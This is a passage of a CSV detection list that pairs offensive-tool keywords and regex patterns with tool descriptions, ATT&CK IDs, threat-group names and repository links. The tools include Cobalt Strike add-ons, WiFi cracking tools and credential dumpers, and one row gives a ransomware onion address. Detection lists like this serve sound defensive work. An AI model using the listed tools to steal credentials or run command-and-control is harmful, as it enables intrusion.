T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tool","https://github.com/DallasFR/WinShellcode","1","1","N/A","N/A","N/A","","N/A","","","","62830" "*Winsocky-main*",".{0,1000}Winsocky\-main.{0,1000}","offensive_tool_keyword","cobaltstrike","Winsocket for Cobalt Strike.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/WKL-Sec/Winsocky","1","1","N/A","N/A","10","10","98","18","2023-07-06T11:47:18Z","2023-06-22T07:00:22Z","62831" "*WINspect.ps1*",".{0,1000}WINspect\.ps1.{0,1000}","offensive_tool_keyword","WINspect","WINspect is part of a larger project for auditing different areas of Windows environments.It focuses on enumerating different parts of a Windows machine to identify security weaknesses and point to components that need further hardening.can be used by attacker ","T1018 - T1082 - T1057 - T1547.001 - T1053","TA0003 - TA0006 - TA0008 - TA0010","N/A","N/A","Reconnaissance","https://github.com/A-mIn3/WINspect","1","1","N/A","N/A","N/A","6","576","100","2019-01-09T12:56:57Z","2017-08-10T15:10:10Z","62832" "*win-x64-DynamicKernelWinExecCalc*",".{0,1000}win\-x64\-DynamicKernelWinExecCalc.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a 
D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Metro-Holografix/DInjector","1","1","N/A","private github repo","8","","N/A","","","","62835" "*Wiper POC tool that wipes a given directory*",".{0,1000}Wiper\sPOC\stool\sthat\swipes\sa\sgiven\sdirectory.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","62836" "*WiperPoc.exe*",".{0,1000}WiperPoc\.exe.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","62837" "*WiperPoc\WiperPoc*",".{0,1000}WiperPoc\\WiperPoc.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","62838" "*wireghoul/htshells*",".{0,1000}wireghoul\/htshells.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","62839" "*wireless/captures.py*",".{0,1000}wireless\/captures\.py.{0,1000}","offensive_tool_keyword","wifibroot","A Wireless 
(WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://github.com/hash3liZer/WiFiBroot","1","1","N/A","network exploitation tool","N/A","10","1008","182","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z","62841" "*wireless/cracker.py*",".{0,1000}wireless\/cracker\.py.{0,1000}","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://github.com/hash3liZer/WiFiBroot","1","1","N/A","network exploitation tool","N/A","10","1008","182","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z","62842" "*wireless/pmkid.py*",".{0,1000}wireless\/pmkid\.py.{0,1000}","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://github.com/hash3liZer/WiFiBroot","1","1","N/A","network exploitation tool","N/A","10","1008","182","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z","62843" "*wireless/sniper.py*",".{0,1000}wireless\/sniper\.py.{0,1000}","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. 
supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://github.com/hash3liZer/WiFiBroot","1","1","N/A","network exploitation tool","N/A","10","1008","182","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z","62844" "*wireless_attack_tools.py*",".{0,1000}wireless_attack_tools\.py.{0,1000}","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1059 - T1078 - T1105 - T1110 - T1566","TA0002 - TA0008 - TA0009 - TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","N/A","10","52217","5629","2025-03-03T15:17:19Z","2020-04-11T09:21:31Z","62845" "*wirelesskeyview.exe*",".{0,1000}wirelesskeyview\.exe.{0,1000}","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1083 - T1552","TA0006 ","N/A","GoGoogle","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A","62846" "*wirelesskeyview.exe*",".{0,1000}wirelesskeyview\.exe.{0,1000}","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","62847" "*wirelesskeyview.zip*",".{0,1000}wirelesskeyview\.zip.{0,1000}","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1083 - T1552","TA0006 ","N/A","GoGoogle","Credential 
Access","https://www.nirsoft.net/utils/wireless_key.html","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A","62848" "*wirelesskeyview.zip*",".{0,1000}wirelesskeyview\.zip.{0,1000}","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","62849" "*WirelessKeyView_x64.exe*",".{0,1000}WirelessKeyView_x64\.exe.{0,1000}","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1083 - T1552","TA0006 ","N/A","GoGoogle","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A","62850" "*WirelessKeyView_x64.exe*",".{0,1000}WirelessKeyView_x64\.exe.{0,1000}","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","62851" "*wirelesskeyview-no-command-line.zip*",".{0,1000}wirelesskeyview\-no\-command\-line\.zip.{0,1000}","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1083 - T1552","TA0006 ","N/A","GoGoogle","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A","62852" 
"*wirelesskeyview-no-command-line.zip*",".{0,1000}wirelesskeyview\-no\-command\-line\.zip.{0,1000}","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","62853" "*wirelesskeyview-x64.zip*",".{0,1000}wirelesskeyview\-x64\.zip.{0,1000}","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1083 - T1552","TA0006 ","N/A","GoGoogle","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A","62854" "*wirelesskeyview-x64.zip*",".{0,1000}wirelesskeyview\-x64\.zip.{0,1000}","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","62855" "*wiresocks-main*",".{0,1000}wiresocks\-main.{0,1000}","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","1","N/A","N/A","9","3","287","30","2024-01-19T10:58:20Z","2022-03-23T12:27:07Z","62870" "*wiresocks-redsocks*",".{0,1000}wiresocks\-redsocks.{0,1000}","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to 
setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","1","N/A","N/A","9","3","287","30","2024-01-19T10:58:20Z","2022-03-23T12:27:07Z","62871" "*WithSecureLabs/physmem2profit*",".{0,1000}WithSecureLabs\/physmem2profit.{0,1000}","offensive_tool_keyword","physmem2profit","Physmem2profit can be used to create a minidump of a target hosts' LSASS process by analysing physical memory remotely","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/WithSecureLabs/physmem2profit","1","1","N/A","N/A","10","5","415","74","2022-07-27T03:33:59Z","2020-02-14T08:34:27Z","62886" "*Witness.py*",".{0,1000}Witness\.py.{0,1000}","offensive_tool_keyword","EyeWitness","EyeWitness is designed to take screenshots of websites provide some server header info. and identify default credentials if known.EyeWitness is designed to run on Kali Linux. It will auto detect the file you give it with the -f flag as either being a text file with URLs on each new line. nmap xml output. or nessus xml output. The --timeout flag is completely optional. and lets you provide the max time to wait when trying to render and screenshot a web page.","T1564 - T1518 - T1210 - T1514 - T1552","TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/FortyNorthSecurity/EyeWitness","1","1","#linux","N/A","N/A","10","5263","870","2024-10-22T22:50:50Z","2014-02-26T16:23:25Z","62887" "*WitnessMe*",".{0,1000}WitnessMe.{0,1000}","offensive_tool_keyword","WitnessMe","WitnessMe is primarily a Web Inventory tool inspired by Eyewitness. 
its also written to be extensible allowing you to create custom functionality that can take advantage of the headless browser it drives in the back-end.","T1210.001 - T1593.001 - T1593.002","TA0010 - ","N/A","N/A","Reconnaissance","https://github.com/byt3bl33d3r/WitnessMe","1","1","N/A","N/A","N/A","8","747","111","2024-09-23T18:34:55Z","2019-07-06T05:25:10Z","62888" "*wkhtmltoimage.py*",".{0,1000}wkhtmltoimage\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","62890" "*WkIKjtCbQzcqQd04ZsE4sFefvpjryhU5w9iVFxGz1oU*",".{0,1000}WkIKjtCbQzcqQd04ZsE4sFefvpjryhU5w9iVFxGz1oU.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","62891" "*WKL-Sec/dcomhijack*",".{0,1000}WKL\-Sec\/dcomhijack.{0,1000}","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM with impacket and DLL Hijacking","T1570 - T1021.003 - T1574.001 - T1574.002","TA0008 - TA0003 - TA0005","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","N/A","7","3","290","24","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z","62892" "*WKL-Sec/dcomhijack*",".{0,1000}WKL\-Sec\/dcomhijack.{0,1000}","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral 
Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","N/A","10","3","290","24","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z","62893" "*WKL-Sec/HiddenDesktop*",".{0,1000}WKL\-Sec\/HiddenDesktop.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","N/A","10","10","1213","187","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z","62894" "*WKL-Sec/Winsocky*",".{0,1000}WKL\-Sec\/Winsocky.{0,1000}","offensive_tool_keyword","cobaltstrike","Winsocket for Cobalt Strike.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - 
NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/WKL-Sec/Winsocky","1","1","N/A","N/A","10","10","98","18","2023-07-06T11:47:18Z","2023-06-22T07:00:22Z","62895" "*wkssvc_##*",".{0,1000}wkssvc_\#\#.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 
- APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","62896" "*WLAN-Windows-Passwords-Discord-Exfiltration*",".{0,1000}WLAN\-Windows\-Passwords\-Discord\-Exfiltration.{0,1000}","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","62897" "*wlbsctrl_payload.bat*",".{0,1000}wlbsctrl_payload\.bat.{0,1000}","offensive_tool_keyword","Ikeext-Privesc","Windows IKEEXT DLL Hijacking Exploit Tool","T1546.011 - T1574.009 - T1036.004","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/securycore/Ikeext-Privesc","1","1","N/A","N/A","10","1","33","52","2018-02-25T13:45:15Z","2018-02-27T11:18:56Z","62898" "*WldpBypass.cs*",".{0,1000}WldpBypass\.cs.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","1","N/A","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","62899" "*wlh3dpptx2gt7nsxcor37a3kiyaiy6qwhdv7o6nl6iuniu5ycze5ydid.onion*",".{0,1000}wlh3dpptx2gt7nsxcor37a3kiyaiy6qwhdv7o6nl6iuniu5ycze5ydid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes 
archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","62900" "*wl-lic -d *.dat -r *.rsa*",".{0,1000}wl\-lic\s\-d\s.{0,1000}\.dat\s\-r\s.{0,1000}\.rsa.{0,1000}","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","N/A","6","2","101","25","2024-04-09T05:30:56Z","2023-07-10T11:57:44Z","62901" "*wl-lic -h HWID -m main_hash -d regkey2.dat -r regkey2.rsa*",".{0,1000}wl\-lic\s\-h\sHWID\s\-m\smain_hash\s\-d\sregkey2\.dat\s\-r\sregkey2\.rsa.{0,1000}","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","N/A","6","2","101","25","2024-04-09T05:30:56Z","2023-07-10T11:57:44Z","62902" "*wmap_crawler.rb*",".{0,1000}wmap_crawler\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62903" "*wmeye.csproj*",".{0,1000}wmeye\.csproj.{0,1000}","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for Lateral Movement","T1047 - T1053.005 - T1124 - T1203 - T1569.002","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/pwn1sher/WMEye","1","1","N/A","N/A","8","4","365","59","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z","62904" "*wmeye.exe *",".{0,1000}wmeye\.exe\s.{0,1000}","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for Lateral Movement","T1047 - T1053.005 - T1124 - T1203 - T1569.002","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/pwn1sher/WMEye","1","0","N/A","N/A","8","4","365","59","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z","62905" "*wmeye.sln*",".{0,1000}wmeye\.sln.{0,1000}","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for Lateral Movement","T1047 - T1053.005 - T1124 - T1203 - T1569.002","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/pwn1sher/WMEye","1","1","N/A","N/A","8","4","365","59","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z","62906" "*WMI KeeTheifLurker 
*",".{0,1000}WMI\sKeeTheifLurker\s.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subscriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","62907" "*WMI KeeTheifLurker * Created*",".{0,1000}WMI\sKeeTheifLurker\s.{0,1000}\sCreated.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subscriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","62908" "*Wmi_Persistence.ps1*",".{0,1000}Wmi_Persistence\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","N/A","10","10","540","86","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z","62909" "*wmi_persistence.rb*",".{0,1000}wmi_persistence\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62910" 